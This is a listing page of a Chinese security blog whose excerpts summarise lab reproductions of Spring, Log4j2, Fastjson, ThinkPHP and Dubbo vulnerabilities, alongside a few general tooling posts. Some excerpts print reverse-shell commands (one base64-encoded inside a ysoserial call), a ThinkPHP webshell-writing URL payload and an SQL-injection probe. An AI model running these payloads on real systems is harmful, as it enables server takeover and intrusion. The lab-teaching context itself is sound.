- 博客(27)
- 收藏
- 关注
原创 CVE-2022-22965:Spring远程代码执行漏洞复现
由于Spring框架历史漏洞修复代码存在缺陷,在 JDK 9 及以上版本环境下,远程攻击者可借助Tomcat中间件构造数据包修改日志文件,从而可在任意路径下写入Webshell等恶意文件,最终可导致执行任意代码控制服务器等危害。Spring框架(Framework)是一个开源的轻量级J2EE应用程序开发框架,提供了IOC、AOP及MVC等功能,解决了程序人员在开发中遇到的常见问题,提高了应用程序开发便捷度和软件系统构建效率。4.使用 spring-webmvc 或 spring-webflux 的依赖。
2024-03-15 16:29:15 1273 2
原创 网神防火墙后台用户登录账号泄露漏洞复现
网神防火墙是一款中国知名网络安全公司启明星辰开发的防火墙产品。它提供了全面的网络安全防护功能,旨在保护企业网络免受各种网络威胁和攻击.该产品存在用户账号信息泄露漏洞,通过构造特定数据包,获取防火墙管理员登录的账号密码.
2023-12-19 17:02:25 973
原创 Kali工具大全(汇总)
kali常用工具汇总,以及做了简单的功能描述,当然,里面的功能可能随着版本的迭代而移除,但我们仍然可以安装,总结不全之处还请谅解.利用msf的exp结合xss构造有攻击性的html页面,当浏览器访问即会受到攻击并获取shell。生成包含exp的windows/android等各平台的可执行文件,木马制作利器。类似gcc的编译器,更轻量,可编译c、c++、Objective-C。基于已捕获握手包和密码字典的WPA-PSK加密的wifi密码的猜解。针对开启WPS的wifi利用WPS随机数生成中的bug来破解。
2023-10-22 10:31:57 779 3
原创 Linux 命令行终端快捷键汇整
熟悉键盘操作可以极大地提高操作效率,熟练的 Linux 用户几乎不需要使用鼠标,仅用键盘就可以更快且更方便地完成所有操作。Linux 命令解释器(也可以叫 Shell,终端,命令行等)也有很多,熟练掌握可以极大的提高操作效率。在本文整理一些最常用的。
2023-10-09 20:00:59 449
原创 CVE-2017-8046 Spring Data Rest 远程命令执行漏洞复现(最详细版本)
在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码.先cd到spring目录下的CVE-2017-8046里面,然后使用docker-compose启动环境.一切都准备好之后就可以启动CVE-2017-8046 的环境了.
2023-09-17 14:50:13 1031 2
原创 CVE-2017-4971 Spring Web Flow 远程代码执行漏洞
当你的应用需要复杂的导航控制,例如向导,在一个比较大的事务过程中去指导用户经过一连串的步骤的时候,SWF将会是一个功能强大的控制器。其中,直接控制field这个值的函数是addDefaultMappings,且未做过滤,而addModelBindings是直接获取的java的一个配置文件,由配置文件来确定是否有 binder 节点,如果有,就无法触发代码执行。Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。
2023-09-07 21:56:58 863
原创 解决:java -version命令没有回显内容的问题,安装多个JDK如何设置默认JDK为JDK1.8
补充:win10可能出现的情况:如果把以 % 开头的目录放到第一个,下次编辑 path 时,就无法显示编辑界面了,而是和win7 的环境变量下的 path 一样,只有一行长串.(自行调节)方法(2) 我的电脑 ->鼠标右键 -> 点击属性 -> 高级系统设置 ->环境变量。方法(1) win+x ->系统 ->高级系统设置 ->环境变量。打开环境变量:(以Windows11为例)jdk 1.8 作为默认,不用做修改.
2023-09-07 10:45:50 920
原创 CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞复现(超详细版!)
它是为了解决企业应用开发的复杂性而创建的。Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞。#按 " i "进行编辑 ,然后复制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.
2023-09-02 15:02:27 1255 1
原创 Docker-compose常用命令
docker-compose config -q 验证(docker-compose.yml)文件配置,当配置正确时,不输出任何内容,当文件配置错误,输出错误信息。docker-compose -f docker-compose.yml up -d # 指定模板。docker-compose build --no-cache nginx #不带缓存的构建。docker-compose up -d nginx #构建建启动nignx容器。
2023-09-01 13:48:02 381 1
原创 Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
2023-08-25 20:26:35 1362 1
原创 解决Error while generating or serializing payload java.lang.reflect.InaccessibleObjetExceotion:Unable
Error while generating or serializing payloadjava.lang.reflect.InaccessibleObjetExceotion:Unable to make field private transient java.util.HashMap java.util.HashSet.map accessible:module java.base does not "opens java.util"ysoserial-main-923a2bda4e-1.jar
2023-08-22 22:47:46 1251 1
原创 kali安装jdk8覆盖自带的jdk11(kali安装java1.8环境)超详细教程
tar -zxf jdk-8u202-linux-x64.tar.gz #解压jdk文件, 这里注意修改你自己的文件名称。mv jdk1.8.0_202 /usr/local/ #将解压好的文件移动到local目录。#1.按esc , 2.按冒号" : " ,3.按 "wq" ,4,按回车. 保存并退出。#按"i"进行编辑 # 复制下面到文件末尾 注意jdk路径!如遇到提示,就再执行一次.
2023-08-21 20:46:52 6579 3
原创 Jsonp&Cors跨域(同源策略、跨域、劫持漏洞)
CORS)跨域资源共享,其思想是使用自定义的HTTP头部字段让浏览 器与服务器进行沟通,它允许浏览器向跨域服务器发出XMLHttpRequest请求,从而克服AJAX只能同源 使用的限制。CORS的基本原理是当浏览器在进行跨域请求时,会在请求中添加头部origin来表明自己的协议、主 机、端口号,当服务器接到请求并且看到这个origin头部时,如果设置过允许此域名进行访问,就得添 加头部Access-Control-Allow-Origin。
2023-08-16 21:02:20 874 1
原创 VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
2023-08-13 15:18:24 4468 2
原创 Fastjson<=1.2.47-RCE反序列化漏洞(CNVD‐2019‐22238)保姆级教程
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其 次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件 开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流 程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也 就是通常所指的“Gadget”),则会造成一些严重的安全问题。
2023-08-10 23:26:34 834 3
原创 thinkphp 5-rce版本漏洞复现(超详细版)
s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码。(3)还可以将php代码写入文件, 此处我们写一个phpinfo。(1)在url输出关于 PHP 配置的信息。说明存在远程命令执行漏洞!ip a #获取自己的本机 ip。(4)查看shell.php内容。直接访问 ip+端口。
2023-08-06 17:19:26 11221 2
原创 Log4j2 CVE-2021-44228漏洞经典复现超详细(vulhub靶场)
log4j2漏洞复现,vulhub漏洞复现,Log4j2 CVE-2021-44228漏洞经典复现(vulhub靶场)
2023-08-06 15:49:13 1241 3
原创 nginx_parsing_vulnerability漏洞复现
vulhub靶场,nginx漏洞复现,nginx_parsing_vulnerability漏洞超详细复现笔记
2023-08-02 17:08:33 253
原创 SSRF服务端请求伪造
是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况况下SSRF攻击的目标是从外网无法访问到的内部系统(正因为它是由服务端发 起的,所以它能够请求到与自身相连而与外网隔离的内部系统)。6、图片加载与下载:通过URL地址加载或下载图片,图片加载远程图片地址此功能用到的地方很多,但大多都是比较隐秘,比如在有些公司中的加载自家图片服务器上的图片用于展示。
2023-07-27 16:26:29 391 1
原创 计算机基础
运算器、控制器统称为中央处理器(CPU):负责数据的算数运算和逻辑运算以及数据的加工处理,协调计算机各部分组件工作与外设的访问,是整个计算机的中枢神经。CPU的性能是影响计算机性能的关键因素,运算器的运算速度直接影响到了系统的速度。一般计算机对存储系统划分为两级:一级存储器(内存),又称为主存储器,他的存取速度快,但容量小,可通过CPU直接访问,内存又可分为随机存储器(RAM)和只读存储器(ROM);另一级为外存储 器,如硬盘,光盘,它的存储速度慢,但容量很大,CPU不能直接访问外存储器中得数据,必须将它得
2023-07-24 18:46:45 142
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人